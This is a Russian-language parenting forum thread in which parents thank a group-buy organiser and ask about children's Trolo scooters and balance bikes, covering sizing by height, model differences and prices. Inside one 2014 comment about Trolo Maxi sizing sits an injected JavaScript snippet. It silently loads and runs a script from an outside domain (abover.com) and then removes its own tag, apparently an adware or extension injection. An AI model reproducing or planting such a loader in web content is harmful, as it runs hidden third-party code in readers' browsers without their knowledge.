Войти

Самокаты,беговелы,велосипеды и машины.Ваши хвастушки!

MARIA
Роман, 18 лет 7 месяцевТаисия, 15 лет 3 месяца Краснодар

Татьяна добрый вечер,спасибо большое за самокат,сын безумно рад


,с самокатом ездит и в туалет и ест с самокатом

и около кровати ставит :) На выходных поедим кататься на улицу :)



0
07.08.2013
Татьяна
Фёдор, 16 лет Москва

Добрый день.Очень рада. И относительно быстро до Вас доехала!!!

0
08.08.2013
MARIA
Роман, 18 лет 7 месяцевТаисия, 15 лет 3 месяца Краснодар

Да кстати хотела сказать что довольна что взяли черный самокат,он смотрится реально КРУТО,я сначала красный хотела но сын настоял на черном! Такого у нас в городе не видела. Сын его называет фантом( как черную машину из  фильма "Такси" :)Дочка хочет кататься,но ей тяжело,он едет легко.Поэтому задумались о mini для нее.Если у вас будут живые фото мини с сиденьям,выставьте пожалуйста посмотреть на него.Еще хотела узнать есть ли защита и шлем от этой фирмы?

Ну и наше фото. 93257b4234e4d20d0d1a0cf56cf09f87.jpg


b88f18695488e0f1062153849a5e8a2c.jpg


0
08.08.2013
Татьяна
Фёдор, 16 лет Москва

Маша, кот на самокате это прикольно.Я вспоминаю наших котов , тоже новые вещи первыми примеряли)))))))))).

Про мини с сидениями мне девочки говорили ,что напрасно потраченные деньги, особо и не пригодилось оно.К сожалению реальных фоток нет с сиденьем,никто не брал.Его можно отдельно купить к мини , из аксессуаров защиты есть только шлемы.

0
08.08.2013
MARIA
Роман, 18 лет 7 месяцевТаисия, 15 лет 3 месяца Краснодар
Понятно,будем думать :)

0
08.08.2013
Lika
Москва

Маша,добрый день!скажите пожалуйста какой фирмы ваша тумба( мебель) ???Мне прям такую же надо.Спасибо

0
04.10.2013
MARIA
Роман, 18 лет 7 месяцевТаисия, 15 лет 3 месяца Краснодар

Доброй ночи ,сразу не написала так как забыла название, нашла буклет,это мебель  лером.


0
09.11.2013
Lika
Москва

спасибо.очень кстати.как раз заканчиваем отделку. примемся за мебель

0
09.11.2013

Маша привет! самокат клевый  а котик вообще))) разводите?

0
09.11.2013
MARIA
Роман, 18 лет 7 месяцевТаисия, 15 лет 3 месяца Краснодар

Привет,не разводим :) но они очень чистоплотные таких и разводить можно :)


0
09.11.2013

мечта моя  

0
10.11.2013
MARIA
Роман, 18 лет 7 месяцевТаисия, 15 лет 3 месяца Краснодар

У меня в дневнике есть его фото :)


0
11.11.2013
natasha
Москва
Здравствуйте! Простите не подскажите Троло Макси для 3,5 — 4 лет при росте 108 см нормально? Не великоват? Заранее благодарна!
[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
0
28.04.2014
Татьяна
Фёдор, 16 лет Москва

Добрый день.

Великоват точно не будет, с роста 95см его вполне можно использовать.

есть на возраст 4года самокат троло  лайт(двухколёсный)

0
28.04.2014
MARIA
Роман, 18 лет 7 месяцевТаисия, 15 лет 3 месяца Краснодар

Добрый вечер,у меня дочка спокойно держится и пытается кататься,рост 100 см. 3 года.Там ручку если до самого конца опустить,то в самый раз. Правда ей самой тяжело,он легко идет,я ее ставлю и катаю.




0
28.04.2014
Katrin
Ларик, 18 лет 2 месяцаСтефан, 17 летГриша, 15 лет 4 месяцаАнечка, 13 лет 9 месяцевСережа, 11 лет 10 месяцевГеоргий, 10 лет 1 месяц Уфа

Котейка-красавец)) И так в самокат вцепился,да на мордочке такое выражение...Хозяин)))

0
17.06.2014

Танюш, спасибо большое за закупку

дети в восторге от самокатов, хотя сын вообще не хотел его)) сегодня весь вечер гоняют по квартире))) завтра пойдем опробовать в парк)

0
26.04.2013
Татьяна
Фёдор, 16 лет Москва

Спасибо,Аня.

Как им по цвету подходят самокаты,супер.

Только жалко завтра погоду передают дождливую,придётся продолжать гонять по квартире

0
26.04.2013

ну ничего и по квартире можно погонять)) дочька с ним спать собиралась лечь,ели отобрала)

0
26.04.2013
Настя
Владислав, 15 лет 2 месяцаЛидия, 10 лет Москва

Скажите, пожалуйста, а у вашей дочки МИНИ?

0
17.06.2013
Татьяна
Фёдор, 16 лет Москва

Настя, отвечу за Аню.

у дочки мини, у сына макси.

отличаются по весу , в макси можно регулировать высоту руля.

0
18.06.2013
Настя
Владислав, 15 лет 2 месяцаЛидия, 10 лет Москва

спасибо за ответ

0
18.06.2013
Валечка
Кэт, 16 лет 10 месяцевЛилия, 13 лет 11 месяцев Волоколамск

То есть изначально высота руля одинаковая? К макси в положении самом низком, как у мини?

0
14.07.2014
Татьяна
Фёдор, 16 лет Москва

Да, высота руля одинаковая

В этом году руль регулируется и у мини

0
14.07.2014
Валечка
Кэт, 16 лет 10 месяцевЛилия, 13 лет 11 месяцев Волоколамск

То есть он выше становится? Не знаю, взять ли сразу 2 макси или мини и макси..девочкам 5 и 2 года. Макси тяжелый, наверно?

0
14.07.2014
Татьяна
Фёдор, 16 лет Москва

Для 2х лет я думаю лучше мини, на 5 лет можно двухколесный лайт или макси , макси+ трехколесные

0
14.07.2014
Валечка
Кэт, 16 лет 10 месяцевЛилия, 13 лет 11 месяцев Волоколамск

Двухколесный стоит вон, ненужный) поэтому трехколесный хочу взять.

0
14.07.2014

да у дочи мини, но лучше брать макси,он такой же высоты

0
18.06.2013
Мария
Арсений, 15 лет 3 месяцаАлёна, 4 года 6 месяцев Москва
Танюша, привет. Спасибо большое за беговел "Yedoo fifty 50 B". Подарили сыну на День Рождение. Ему очень понравилось. Катается везде, где только можно :) хорошо кататься научился за 3 дня  smiley-smile.gif (правда поставщик не правильно собрал тормоз и муж когда его исправлял он треснул, но ничего, надеюсь деталь докупим), а так все отлично. Спасибо.
f38945ee21b6dae32ef74d0dc02e51d2.jpg
0
17.03.2014
Татьяна
Фёдор, 16 лет Москва

Спасибо. Какие Вы крутецкие?

0
17.03.2014
Мария
Арсений, 15 лет 3 месяцаАлёна, 4 года 6 месяцев Москва

Дааааа  lol.gif сын в восторге!) даже по дому катается  3be4e7d5883a1ac91afcd568524c82b7.gif

0
17.03.2014
Катя
Москва
подскажите какой рост у вашего сына? тоже понравился этот беговел
0
01.04.2014
Татьяна
Фёдор, 16 лет Москва

от  роста 90см беговелы

0
01.04.2014
Катя
Москва
это я знаю. пытаюсь примерить на рост 97см. до какого роста рассчитан не знаете?
0
01.04.2014
Татьяна
Фёдор, 16 лет Москва

на 10см поднимается сиденье,соответственно 100см, опять же зависит от длины ноги

0
01.04.2014
Мария
Арсений, 15 лет 3 месяцаАлёна, 4 года 6 месяцев Москва

ДД. У сына рост 103см

0
12.04.2014
Ольга
Москва

Подскажите как по весу беговел не тяжеловат для ребенка??

0
27.10.2014
Мария
Арсений, 15 лет 3 месяцаАлёна, 4 года 6 месяцев Москва
ДВ. Нет, он очень легкий  smiley-smile.gif
0
27.10.2014
Светлана
Эмилия, 16 лет 11 месяцевКатерина, 22 года 11 месяцевОлег, 33 года 8 месяцев Москва

0
17.05.2013
Татьяна
Фёдор, 16 лет Москва

Спасибо за отзыв,Света!

Дочки красотки!!!

0
18.05.2013
Яшка
Иркутск

Светлана скажите какого возраста и роста ваша младшая дочь, надо для выбора самоката

0
24.05.2013
Светлана
Эмилия, 16 лет 11 месяцевКатерина, 22 года 11 месяцевОлег, 33 года 8 месяцев Москва

Добрый день!!! Макси тем и хорош, что он и для самого маленького подходит и до 3-го класса ( до 50 кг)моей младшей 3г.10,     ростне знаю, вещи беру на 110

0
24.05.2013
Яшка
Иркутск

Светлана ДД!!! Скажите у троло макси телескопическая ручка не болтается?  не гремит? А то у многих самокатов других фирм они болтаются, шумят.

0
12.06.2013
Светлана
Эмилия, 16 лет 11 месяцевКатерина, 22 года 11 месяцевОлег, 33 года 8 месяцев Москва

ДУ! Ручка очень удобная,толька моя разбышака оторвала украшения по бокам..

0
12.06.2013
Ольга
Анна, 26 лет 11 месяцевВячеслав, 16 лет 7 месяцевАлександр, 14 лет 4 месяца Москва
Светлана,у вас самокат у стршей с диаметром колес 200?
0
11.04.2015
Татьяна
Фёдор, 16 лет Москва

200 диаметр колёс в этой модели

0
16.04.2015
Светлана
Эмилия, 16 лет 11 месяцевКатерина, 22 года 11 месяцевОлег, 33 года 8 месяцев Москва
Доброй ночи!Проще спросить у Танюши, я не помню....А он сейчас далеко в гараже стоит
0
15.04.2015
Татьяна
старший котик, 14 лет 2 месяцамладший котик, 10 лет 2 месяца Москва

9a9798c3d717db49cb8b51a54cd16b09.jpg 4208d6a9f9f464549b869c35f8c4f678.jpg

обновлю пост немножко :) Татьяна, спасибо за транспорт :) это мой сынуля, малый да удалый :) рост 105-106. троло макси

efe6743a2749f63b0ecf29d995c8feac.jpg 

0
27.02.2015
Лариса
Деня, 26 лет 3 месяцаДаня, 13 лет 10 месяцев Реутов

ДВ! подскажите пожалуйста, как самокат в управлении, удобен ли малышу? 
0
27.03.2015
Татьяна
старший котик, 14 лет 2 месяцамладший котик, 10 лет 2 месяца Москва

очень! научился минут за 30, я с ним прошла пару кругов, показала как поворачивать наклоном руля, через полчаса он уже гонял :) теперь мама за ним бегает, тоже польза. я очень довольна самокатом, без него сын не гуляет

0
27.03.2015
Лариса
Деня, 26 лет 3 месяцаДаня, 13 лет 10 месяцев Реутов

спасибо за ответ! как вы думаете, у малыша рост 91 см, не велик нам будет?
0
27.03.2015
Татьяна
старший котик, 14 лет 2 месяцамладший котик, 10 лет 2 месяца Москва

я брала на рост 90-92, но это было в 2 года ровнло, в 2 он не поехал, заинтересовался, чуть ездил, но без особой охоты, а вот сейчас поехал :) 

я думаю вашему будет как раз по высоте, но если вес у ребенка небольшой, то может имеет смысл сначала мини рассмотреть. он полегче на кг по-моему

0
27.03.2015
Лариса
Деня, 26 лет 3 месяцаДаня, 13 лет 10 месяцев Реутов

Спасибо вам огромное за помощь!
0
27.03.2015
Татьяна
старший котик, 14 лет 2 месяцамладший котик, 10 лет 2 месяца Москва
не за что :) удачного выбора!
0
27.03.2015
Марю
Сын, 14 лет 6 месяцевДоча, 11 лет 6 месяцевСынуль, 8 лет 5 месяцевДочуль, 1 год 7 месяцев Нальчик

а то  что он аналог а не оригинал как то отразилось на его качестве? нигде не люфтит?

0
05.05.2015
Евгения
Москва

Татьяна, спасибо! Самокатом очень довольны — используем и в хвост и в гриву, катаем и летом и зимой — круглый год. Используем ежедневно, выйти на улицу без него не можем. Добавляю свой хваст! 445c89e25b588c157ebfbf6fa43848db.jpg
0
12.09.2014
Лена
Ульяна, 15 лет 7 месяцевЗахар, 13 лет 7 месяцевМарк, 10 лет 9 месяцев Железнодорожный

Жень, дд! это у вас троло макси или макси +?
0
22.03.2015
Евгения
Москва

ДД! Троло макси.
0
24.03.2015
Лена
Ульяна, 15 лет 7 месяцевЗахар, 13 лет 7 месяцевМарк, 10 лет 9 месяцев Железнодорожный

спасибо )))
0
24.03.2015
Nata
Сыночек!, 15 лет 8 месяцевДоча, 6 лет 8 месяцев Москва
а рост у вас и вес какой? на 5 лет подойдет?
0
17.07.2015
Евгения
Москва
на фото 4.5 года рост 110-116 худощавый. в 5.5 стал на двухколесном гонять.

0
17.07.2015
Nata
Сыночек!, 15 лет 8 месяцевДоча, 6 лет 8 месяцев Москва

вот и я дума, а стоит ли нам брать трехколесный? или подождать до след. года и взять самокат на постарше? мнеб на это лето перекантоваться....дешевых нет...((

0
17.07.2015
Евгения
Москва

возьмите на постарше сейчас и покатайте его за ручку самоката - пусть почувствует как равновесие держать — будет сам гонять.
0
17.07.2015
Татьяна, спасибо огромное за самокат. У нас TROLO TEEN, просто супер!!! Очень хороший самокат, нам сейчас 4,5 года, этот самокат заявлен с 5 лет. Но мы себя очень на нем уверенно чувствуем, т.к. вообще на самокате уже третий год.  Катается даже папа, т.к. самокат выдерживает 100кг. Мы очень-очень довольны приобретением, сын передает вам большое спасибо! 6be6a80fff23e027ab22af43f279f3f9.jpg
0
23.03.2014

Валентина, если Вас не затруднит ответить, меня интересует, как ведет себя самокат на неровных поверхностях, на выбоинах в асфальте, сильно ли трясет, ход мягкий? 

0
24.03.2014
Если это волнистый асфальт, то все отлично, если выбоины небольшие, то тоже проезжает нормально, на конкретных выбоинах не пробовали, т.к. мой сынок уже соображает в силу возраста, что может застрять колесо и он упадет, ход мягкий, не дребезжит. На самокате катались наш папа и еще один папа, так оба в восторге, сказали, что самокат то, что надо.
0
30.03.2014

Спасибо. Самокат уже у нас :) Сегодня папа с ребенком ходили, сказал нормально. Я завтра сама на собираюсь, а ребенок на беговеле поедет.

Таня, спасибо за закупку, взяли по хорошей цене нормальное качество!

0
30.03.2014
Татьяна
Фёдор, 16 лет Москва

Спасибо за отзыв,

отличный транспорт для будущего лета

hello.gif

0
24.03.2014
Динара
Альбина, 16 летДанияр, 13 лет 10 месяцевЖду малыша, 19 неделя Москва

Валентина, добрый день! не подскажите, ваш сын сразу поехал на 2х-колесном? моя дочка 2 года катается на трехколесном, вот думаю купить ей троло макси или все-таки teen уже можно, как думаете? и какого вы роста ?

0
20.05.2014

Добрый день, Динара! Мы тоже катались 2 года на 3-х колесном, но у нас был Экпоуер,а в нем задние колеса на маленьком расстоянии друг от друга. Еще мой сын периодически менялся с друзьями на прогулках, у которых уже были 2-х колесные, поэтому я знала, что он умеет. Рост у нас порядка 112см, точно не скажу. Сам самокат тяжеловат в силу своей прочности и надежности, но поднимать на бордюр девочке, которой еще нет 4-х лет, будет сложно.

0
21.05.2014
Марина
Данила, 23 года 8 месяцевДимуля, 14 лет 9 месяцев Балашиха
Вот наш мини. Спасибо большое Танюше!!! 
93d03e67a2194f52066ae35b31b7ff82.jpg 
1ac3baf23beeaa0fbc5e6709133ea7e5.jpg Димке 2года 6 мес, рост около 85-86 см, вес 11-12 кг.
0
17.03.2014
Татьяна
Фёдор, 16 лет Москва

Срасибо, сынуля красавчик!

0
17.03.2014
Марина
Данила, 23 года 8 месяцевДимуля, 14 лет 9 месяцев Балашиха
super_smilies086.gif
0
17.03.2014
Виктория
, 21 год 8 месяцев, 13 лет 2 месяца Подольск
Марина,добрый день. Хотела спросить,как вам ваш мини,то же подумываем взять,вы еще не выросли из него?
0
04.03.2015
Марина
Данила, 23 года 8 месяцевДимуля, 14 лет 9 месяцев Балашиха
ДД. Нет, не выросли. отлично. мы мелкие, в нас роста 93-94 см и веса 13 кг, этот сезон ещё откатаем точно.
0
04.03.2015
Виктория
, 21 год 8 месяцев, 13 лет 2 месяца Подольск
Спасибо,значит будем брать)))
0
04.03.2015
Оксана
Москва
Танюш, ДД! Порекомендуйте самокат для 5летнего мальчика. И цена?
0
20.04.2015
Татьяна
Фёдор, 16 лет Москва
Оксана, добрый день. Из трехколесных только троло буст есть только на складе. Из 2х колесных троло К145. Посмотрите пост с закупкой, там и описание и фото есть.
0
20.04.2015
Оксана
Москва
Спасибо)
0
20.04.2015
Оксана
Москва
Спасибо)
0
20.04.2015
Оксана
Москва
Тань, а напишите, пж, цену. С тлф сложно мне в прайсе их найти)
0
20.04.2015
Татьяна
Фёдор, 16 лет Москва
41 доллар оптовая цена, курс цб на день выкупа.
около 3 тыс получается
0
20.04.2015
Ольга Т.
Евик, 15 лет 4 месяцаДимик, 12 лет 6 месяцев Белая Калитва

Заказывала самокат еще для старшей дочки летом 2013 и вот уже младший 1 год 5 мес на нем гоняет-спасибо большое!  b61c5fd1f21fd1f18d1f64eef38def16.jpg

0
17.05.2015
Евгения 0000
Санкт-Петербург
Подскажите пожалуйста рост вашего сына?
0
17.05.2015
Ольга Т.
Евик, 15 лет 4 месяцаДимик, 12 лет 6 месяцев Белая Калитва

83см

0
18.05.2015
Евгения 0000
Санкт-Петербург
Спасибо, значит и нам пора;)
0
18.05.2015
Татьяна
Фёдор, 16 лет Москва
Ольга, добрый день. Спасибо за отзыв.
0
18.05.2015
Irina
Максим, 19 лет Москва

Татьяна, спасибо огромное!!!!! Самокат СУПЕРРРР!!!   Сынуля в восторге. Брали для 6-ти летнего ребенка самокат МОДЕЛЬ OX , хотя он расцчитан на ребенка 8+.

 

0
01.06.2013
Татьяна
Фёдор, 16 лет Москва

И Вам спасибо за хваст!

0
01.06.2013
Светлана
Эмилия, 16 лет 11 месяцевКатерина, 22 года 11 месяцевОлег, 33 года 8 месяцев Москва

0
30.04.2013
Татьяна
Фёдор, 16 лет Москва

Привет! Какая красавица дочурка.Я смотрю так хорошо смотрятся эти самокаты,стильно.

Давайте и макси осваивайте.

Спасибо и Вам!

0
01.05.2013
Мика
Москва

ДВ! Как вам Модель TROLBlack/ White? Как качество? Не болтается ручка? Не скрипит?


0
18.09.2013
Викулина
Сереженька, 17 летМаксюшка, 14 лет 3 месяца Москва

Таня мега спасибо,получила наш ТРОЛО,довольно сделан на первый взгляд добротно, едет тихо. Утром сама каталась по квартре, благо   рост позволяет. Первое время  непривычно управлять, но привыкаешь достматочно быстро. Пожадлела, что сразу не заказала мини для моего годоваса, так что скоро еще будет заказик

0
17.05.2013
Татьяна
Фёдор, 16 лет Москва

Очень рада, что не разачаровались!!!

0
18.05.2013
Оксана
Кирилл, 15 лет 7 месяцев Железногорск

Татьяна, спасибо большое за самокат брали ТРоло Макси для ребенка 2,5 лет, гоняет только так, самому очень нравится , а папа наш не нарадуется. Ну и конечно по цвету угодили ребенку, он предпочитает все оранжевое 

0
07.05.2013
Татьяна
Фёдор, 16 лет Москва

Очень рада!

0
07.05.2013
Natalia
ГЛЕБУШКА, 13 лет 8 месяцев Москва

Татьяна, спасибо за Троло мини! Сынуля (1,5г.) в восторге:) Пока мы только учимся управлять им самостоятельно, нашли массу применений , чтоб без дела не стоял:) Колеса - это самая нужная и важная деталь для сына:)) "Рулит" то одним, то другим колесом - " я в автомобиле"! края у ручки резиновые тоже очень удобные  для "почесать зубки", которые лезут активно:) эксплуатирует миньку по максимому:))

0
06.03.2014
Татьяна
Фёдор, 16 лет Москва

Спасибо за отзыв, научится к лету!!!

будет летать не поймаешь)))))))))

0
06.03.2014
Татьяна
Фёдор, 16 лет Москва

Мы тоже успели выгулить наш ТРОЛО.

0
04.05.2013
Sanechka
Вениаминчик, 15 лет 7 месяцевТаисия, 12 лет 8 месяцевЕкатерина, 11 лет Пенза

Здравствуйте!!!!А у вас мини или макси- на какой возраст брали. Нам 2.6- думаю, мини не маловат будет.

0
12.06.2013
Evgen
Аришка, 26 лет 4 месяцаЛеруська, 14 лет 8 месяцев Москва

Татьяна, дд! А для малышей они подходят? Можете предложить?- нам 2 года))

0
19.09.2013
Татьяна
Фёдор, 16 лет Москва

Добрый день. Мини подходят для 2х лет

0
20.09.2013
Evgen
Аришка, 26 лет 4 месяцаЛеруська, 14 лет 8 месяцев Москва

Да, уже прочитала))

0
21.09.2013
Катюша
сладкий, 16 лет 10 месяцев Раменское

Татьяна,спасибо самокат клевый!  учимся кататься )

0
22.05.2013
Татьяна
Фёдор, 16 лет Москва

0
01.06.2013
Светлана
Эмилия, 16 лет 11 месяцевКатерина, 22 года 11 месяцевОлег, 33 года 8 месяцев Москва

Танюша,спасибо огромное!!!!!!!

0
30.04.2013
София
Дочик, 15 лет 11 месяцев Домодедово

Ухты вот это фронт фото))) Кот ваш (или кошечка) просто шикарен.

0
27.12.2013
Татьяна
Фёдор, 16 лет Москва

Котик не мой . Девочка хваст прислала, мне понравилось!!!!

0
27.12.2013
Lika
Москва

Скажите,пожалуйста какой фирмы тумба(комод) на заднем плане??? Уж очень нравится!!!! Спасибо

0
04.10.2013
Татьяна
Фёдор, 16 лет Москва

посмотрите ниже коменты,девушка из г. Сочи -Мария.

0
04.10.2013
Наталия
Санечка, 30 лет 6 месяцевАртёмка, 15 лет 6 месяцев Москва

ТАТЬЯН,СПАСИБО ОГРОМНОЕ ЗА САМОКАТ..ОН РЕАЛЬНО КРУТОЙ СЫНОЧЕК  ОЧЕНЬ ДОВОЛЕН 3c3f9bda73fa8c7706058aa03238514c.jpg

0
25.08.2014
Mария
Павел, 25 летВалерия, 15 лет 1 месяц Москва

Спасибо за самокат ! Дочке 3 года рост 98 см . Брали Троло Макси .  Дочке очень нравиться . Гоняет как Шумахер . Научилась кататься за 2 дня .  Не чего с ним с мая не случилось . Сын тоже покатался )))) он у нас 47 кг весит .

0
14.08.2014
Брюнетка!
Сынок, 16 лет 9 месяцевДочка, 12 лет 6 месяцев Рязань

Спасибо большое за самокат! Он круто смотрится и классно едет! Совсем бнзшумно и плавно!


0
24.05.2014
Weralik@
Алексей, 22 года 1 месяцАлександр, 14 лет 1 месяц Ханты-Мансийск

eff19ed21e58271d4b5e82b32637878f.jpg

Огромное спасибо, самокат просто супер :))) 

0
24.02.2014
Леся (brumsa)
Роднуля-красотуля.., 16 лет 10 месяцевБеляк, 14 лет 10 месяцевСладкая, 11 лет 2 месяца Реутов

что  за порода кошек?

0
24.11.2014
Татьяна
Фёдор, 16 лет Москва

Абисинка

Но эта не мой кот, хваст одной участницы.

0
24.11.2014
Мэри
Владимир, 16 лет 5 месяцев Москва

Классная фотка! Даже кошке нравиться!

0
13.02.2014

Абисинка шикарная!!!!!

0
24.10.2013
Светлана
Эмилия, 16 лет 11 месяцевКатерина, 22 года 11 месяцевОлег, 33 года 8 месяцев Москва

Спасибо!!!!

0
17.05.2013
Хвастики и обзор игрушек из ЕЛ**Ка ХВАСТИКИ....

Похожие записи